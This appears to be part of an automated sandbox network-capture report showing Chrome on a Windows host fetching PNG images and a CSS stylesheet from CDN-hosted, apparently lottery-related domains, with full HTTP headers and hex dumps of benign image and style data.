                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 44229
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:48 GMT
                                                                                                                                                          ETag: "5d71fe80-acc5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE8[3],EU-FRA-paris-GLOBAL1-CACHE7[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465103
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 68d6cbcfee4d907336198716c00564c2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC15769INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 98 6c c7 75 2e 0e bf ab 60 53 e3 f0 cc 41 e9 48 3a 92 c5 cc 2c 0b 2c 99 65 8c 1d 5b 26 81 f1 da b9 31 e5 c6 49 ec 24 be 71 92 9b 98 65 81 2d cb b6 cc 10 a3 98 99 c9 62 9d a3 c3 67 78 a6 71 43 55 ad df 1f 7b f7 9c 11 1b 24 fb de ef 4b 3d 4f 3f 3d dd d3 bd 7b ef da ab 56 2d 78 d7 bb 08 ff ff 3e e8 77 f8 4c b4 3d f6 7a df f7 5e 35 25 b6 ff 99 65 02 49 01 e3 80 01 bb f6 b8 87 fe e3 0d 57 c2 ac
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxulu.`SAH:,,e[&1I$qe-bgxqCU{$K=O?={V-x>wL=z^5%eIW
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: e9 04 40 31 4e 39 f3 ac fe 26 f5 ed e4 64 b4 42 c0 90 23 dc 0f 63 0b ba b2 45 19 85 85 63 3a 40 58 dc f3 ad 2f cf 1d f9 ee f7 89 13 de 7e 7a f9 d2 6f 7c ae 05 28 28 41 0a 4e 05 80 89 20 55 65 a7 2c 6d 3d 0e 34 01 97 42 91 c2 b6 52 4a 03 88 18 70 53 b8 f2 bc cf de 07 c7 f7 9d 72 fa 07 fa 9c d2 3b eb 5a b8 ff 91 a7 9c 7c d5 b5 ff f5 2d db 2b 5a 75 45 e0 d7 38 7b b0 d6 0a 49 92 e4 5e a2 b1 cf 3b 01 8b 51 0b a5 72 39 d5 5a 39 00 a2 97 6a ca 43 0b 60 66 01 b6 8e 14 49 16 52 90 73 96 a5 54 a4 94 ea 05 77 f3 9c 87 b5 e4 4c c6 b0 a0 24 51 68 36 9b 1c f8 9a 9c 31 0c c7 14 05 1e 1f 7b f4 91 d4 d7 37 00 cf f3 58 11 c8 d3 92 83 c0 cf c3 28 f9 fd 80 54 82 01 41 ce 58 f6 b4 26 4d 92 4b a4 d0 a7 43 dc 73 ff 6f 31 39 39 49 87 1f 79 24 f7 0d 0d 10 04 b1 33 86 42 e1 a1 3b
                                                                                                                                                          Data Ascii: @1N9&dB#cEc:@X/~zo|((AN Ue,m=4BRJpSr;Z|-+ZuE8{I^;Qr9Z9jC`fIRsTwL$Qh61{7X(TAX&MKCso199Iy$3B;
                                                                                                                                                          2024-06-09 22:41:22 UTC12076INData Raw: 35 de 7a e5 27 9b 0b b6 71 98 ca 34 0e 0f 75 34 46 20 1c 9b e0 5c 63 c2 f6 fd c7 af ef b9 e9 f0 af 1e b8 b5 1d b6 df 69 af 59 09 b0 8f 42 31 6b 13 36 7c 61 fd 3d 77 b7 03 05 c0 16 f0 f6 ab 3e 38 1a 24 a7 76 77 1e 7c ea f9 5f 3d 10 b9 94 48 08 22 e0 7d 97 7f c0 ac 5a b6 fa 1e 5d 2a 7d 01 ee a8 5f 39 58 80 d9 95 60 3c 21 b4 85 08 1b 47 8e 32 1f fc d0 e2 a7 1e ff ed 23 d3 d7 ad 5d 3d d9 13 e4 15 8d a5 94 ef 21 c1 19 4a 65 32 d0 46 93 97 08 90 4e 27 8b 8b 16 2d da 6c 8b e1 b8 52 36 db e8 78 43 2c 54 8c be 30 28 7b b8 d8 7b 31 c3 da 88 60 5c 07 3d 1b 0b 18 13 77 7d 3b af 67 a2 12 04 11 79 52 40 0a 45 b3 67 9d 88 65 ab d7 22 91 ae 43 ae bf 84 7c be 44 dd d6 e2 57 bf 7e 94 66 4f 9f 8e c9 c7 4d 84 31 51 ec b2 8e c6 48 0c 0d 0c 8e fe dd ab 79 44 21 08 d5 55 49 8c
                                                                                                                                                          Data Ascii: 5z'q4u4F \ciYB1k6|a=w>8$vw|_=H"}Z]*}_9X`<!G2#]=!Je2FN'-lR6xC,T0({{1`\=w};gyR@Ege"C|DW~fOM1QHyD!UI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          630192.168.2.55041590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC613OUTGET /pc/image-pc/index/312/nav/lottery/lotto03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 43964
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 16 Jun 2021 07:20:11 GMT
                                                                                                                                                          ETag: "60c9a62b-abbc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE12[303],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,302],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d922dadec0ff6041180e75c23a695360
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105852
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 90 08 06 00 00 00 da d4 83 de 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 23 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 33 35 32 2c 20 32 30 32 30 2f 30 31 2f 33 30 2d 31 35 3a 35 30 3a 33 38 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 5d 97 ec d6 01 13 d2 35 4a b2 6c 7c 89 ff 33 f5 f0 a1 01 c6 a7 8b d8 d4 bb 76 ef 4f 42 34 f3 9e 74 86 bf 25 2d 93 2f 03 dd d4 70 83 91 4e 66 62 8b 4e ea 09 2c e4 80 58 e7 1c 4a a5 91 9c 98 db 37 ec 8b 1f 3d d2 36 31 38 bc b0 34 30 b1 48 96 94 85 0e af a3 dd d3 50 6d f2 b6 57 43 ac b7 a3 60 e3 21 67 8b e0 22 39 28 05 99 5c 91 81 80 42 6c 62 35 69 cb 9e 19 b2 39 62 16 d2 21 1e 23 22 b1 28 92 85 3c f2 a2 03 ec e9 ae a1 9c 80 03 a3 69 1c 3b 76 0c 9d 87 f7 d3 f7 04 1e 02 9c 4d e2 e1 b0 58 30 7d c6 34 24 52 49 aa 3e 72 41 4e 17 9c 64 b5 1d 0e 37 78 de a2 65 e5 b1 a1 70 96 e6 50 64 13 ad 08 da 6c 44 7b 6c 64 00 c1 81 63 04 89 0c 84 5c 0c b6 40 2d da 2f f9 e2 2b 4d 7e e7 7d 01 8f f2 d2 4a bf 3d e5 16 45 ab 02 d9 21 13 df b0 29 2f 04 30 c6 a0 e6 49 9b 2d 04 68 6b
                                                                                                                                                          Data Ascii: ]5Jl|3vOB4t%-/pNfbN,XJ7=61840HPmWC`!g"9(\Blb5i9b!#"(<i;vMX0}4$RI>rANd7xepPdlD{ldc\@-/+M~}J=E!)/0I-hk
                                                                                                                                                          2024-06-09 22:41:22 UTC11825INData Raw: 0f c5 ff 69 e3 3e f2 b9 0a ee 7d e1 f1 e9 88 a2 8e a5 17 ca a8 68 46 d5 ad 79 6d e1 80 f4 42 b5 68 6e e8 dc da be 27 95 9d 5f 2a 95 f2 9d b9 6c 31 94 5a 29 10 21 d1 c5 6a 3d 49 9b b8 ce 59 90 d3 6d c7 ed 77 dc 86 9d 3b 77 f1 84 d6 b5 d7 ec a1 87 2f 63 8a 28 71 81 58 c1 72 5e c2 4a c6 45 ee d5 8b 3a 3d 8c 95 c5 15 6c 1e da 42 ae 56 e3 07 78 3e f2 1c 7c 64 6b a3 39 7f 85 85 2c 1b 61 05 bf d7 43 60 d2 c0 e1 c9 49 74 f7 0f e0 91 d7 4e 80 c9 e2 08 0d 03 8c 3c 2f d7 04 a4 cb 0d f8 9d 12 2f 7c 66 2d b7 12 63 4b bc 69 fe 5c 40 e2 e9 18 36 eb 8e bc 97 2a 21 58 35 30 77 cf 1f 20 76 d7 e7 b1 76 ef fb b1 78 62 3f 0e ff fd 57 11 e9 5d 0d 5f fb 20 3f ec 03 01 50 86 5b 0c 5a 30 a6 2a 3b 39 3f 0e ab 9a 40 7f 67 3f ca 23 c7 30 ff c0 8f d1 e6 0b c2 24 16 d4 f0 10 86 12 f3
                                                                                                                                                          Data Ascii: i>}hFymBhn'_*l1Z)!j=IYmw;w/c(qXr^JE:=lBVx>|dk9,aC`ItN<//|f-cKi\@6*!X50w vvxb?W]_ ?P[Z0*;9?@g?#0$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          631192.168.2.550412183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC641OUTGET /061410/rcenter/msites/themes/default/style.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC671INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 73468
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-16-05
                                                                                                                                                          ETag: "655579ca-11efc"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:22 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;yancmp16:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-YANC-MP-16-05
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-12
                                                                                                                                                          X-Cdn-Request-ID: 27286fead546930a73a2424beca225ba
                                                                                                                                                          2024-06-09 22:41:22 UTC15713INData Raw: 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 36 37 36 61 36 63 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 61 3a 66 6f 63 75 73 2c 61 3a 61 63 74 69 76 65 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 5b 74 79 70 65
                                                                                                                                                          Data Ascii: body{font-family:'Microsoft YaHei',"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:13px;color:#676a6c;overflow-x:hidden}a:focus,a:active,button::-moz-focus-inner,input[type="reset"]::-moz-focus-inner,input[type="button"]::-moz-focus-inner,input[type
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 77 3a 30 20 30 20 33 70 78 20 23 39 39 39 3b 6f 70 61 63 69 74 79 3a 2e 39 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 39 30 29 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 39 30 29 7d 2e 66 6f 72 75 6d 2d 61 76 61 74 61 72 20 2e 69 6d 67 2d 63 69 72 63 6c 65 7b 68 65 69 67 68 74 3a 34 38 70 78 3b 77 69 64 74 68 3a 34 38 70 78 7d 2e 6d 65 64 69 61 2d 62 6f 64 79 3e 2e 6d 65 64 69 61 20 2e 66 6f 72 75 6d 2d 61 76 61 74 61 72 20 2e 69 6d 67 2d 63 69 72 63 6c 65 7b 68 65 69 67 68 74 3a 33 38 70 78 3b 77 69 64 74 68 3a 33 38 70 78 7d 61 2e 66 6f 72 75 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31
                                                                                                                                                          Data Ascii: w:0 0 3px #999;opacity:.9;-ms-filter:alpha(opacity=90);filter:alpha(opacity=90)}.forum-avatar .img-circle{height:48px;width:48px}.media-body>.media .forum-avatar .img-circle{height:38px;width:38px}a.forum-item-title{color:inherit;display:block;font-size:1
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 20 6c 69 2c 2e 74 6f 70 20 75 6c 2e 74 69 70 73 20 6c 69 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 74 6f 70 20 75 6c 2e 74 69 70 73 20 6c 69 20 2e 69 6d 67 2d 63 69 72 63 6c 65 7b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 74 6f 70 20 75 6c 2e 74 69 70 73 20 6c 69 20 61 2e 6c 6f 63 61 74 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 33 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 6f 70 20 75 6c 2e 74 69 70 73 20 6c 69 20 61 2e 6c 6f 63 61 74 65 20 2e 69 63 6f 6e 66 6f 6e 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 7d 2e 74 6f 70
                                                                                                                                                          Data Ascii: li,.top ul.tips li{float:left;position:relative;padding:0 5px}.top ul.tips li .img-circle{width:24px;height:24px;margin-right:10px}.top ul.tips li a.locate{display:block;height:35px;position:relative}.top ul.tips li a.locate .iconfont{font-size:26px}.top
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 3a 68 6f 76 65 72 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 64 69 73 61 62 6c 65 64 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 64 69 73 61 62 6c 65 64 3a 61 63 74 69 76 65 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 64 69 73 61 62 6c 65 64 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 5b 64 69 73 61 62 6c 65 64 5d 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 5b 64 69 73 61 62 6c 65 64 5d 3a 61 63 74 69 76 65 2c 2e 62 74 6e 2d 64 65 66 61 75 6c 74 2e 61 63 74 69 76 65 5b 64 69 73 61 62 6c 65 64 5d 2c 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 2e 62
                                                                                                                                                          Data Ascii: :hover,.btn-default.disabled:focus,.btn-default.disabled:active,.btn-default.disabled.active,.btn-default[disabled],.btn-default[disabled]:hover,.btn-default[disabled]:focus,.btn-default[disabled]:active,.btn-default.active[disabled],fieldset[disabled] .b
                                                                                                                                                          2024-06-09 22:41:22 UTC8603INData Raw: 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 7d 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 31 30 34 35 70 78 29 7b 2e 63 75 73 74 6f 6d 5f 77 72 61 70 20 2e 74 68 65 6d 65 5f 74 79 70 65 20 75 6c 20 6c 69 2e 74 79 70 65 20 61 2c 2e 63 75 73 74 6f 6d 5f 77 72 61 70 20 2e 74 68 65 6d 65 5f 74 79 70 65 20 75 6c 20 6c 69 2e 70 61 63 6b 5f 75 70 20 61 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 74 6f 70 20 75 6c 2e 74 69 70 73 20 6c 69 2e 74 68 65 6d 65 73 2c 64 69 76 2e 74 68 65 6d 65 73 5f 6c 69 73 74 20 2e 63 75 73 74 6f 6d 5f 77 72 61 70 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 74 6f 70 20 75 6c 2e 68 6f 6d 65
                                                                                                                                                          Data Ascii: ;overflow-y:hidden}}@media(max-width:1045px){.custom_wrap .theme_type ul li.type a,.custom_wrap .theme_type ul li.pack_up a{padding:0 15px;font-size:14px}@media(max-width:768px){.top ul.tips li.themes,div.themes_list .custom_wrap{display:none}.top ul.home


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          632192.168.2.55041443.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC379OUTGET /pc/image-pc/index/121/homePage-bg.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC349INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "61260a0d-16e350"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 25 Aug 2021 09:14:53 GMT
                                                                                                                                                          Content-Length: 1499984
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 4237219023863510272
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1116INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 0b d0 08 06 00 00 00 e4 8c 28 45 00 00 20 00 49 44 41 54 78 5e ec d9 51 0d 00 20 0c 43 41 50 31 ff 4a 21 c1 05 2f 37 07 bd ee af 7b 66 ce 72 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 f0 bd c0 36 00 7f df a1 00 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 78 02 06 60 8f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40
                                                                                                                                                          Data Ascii: PNGIHDR(E IDATx^Q CAP1J!/7{fr @ @ @ 6 @ @ @x`@ @ @ @8R @ @ @0 @ @ @D" @
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 18 80 fd 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 22 02 06 e0 48 91 62 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 c0 00 ec 07 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                                          Data Ascii: @ @ @ @ @"Hb @ @ @ @ @ @ @ 0G @ @ @`?@ @ @ @8R @ @ @0 @
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04
                                                                                                                                                          Data Ascii: @ @ @ 0G @ @ @`?@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`)
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 7e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70 a4 48 31 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                                                          Data Ascii: @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`) @ @ @~ @ @ @pH1 @ @
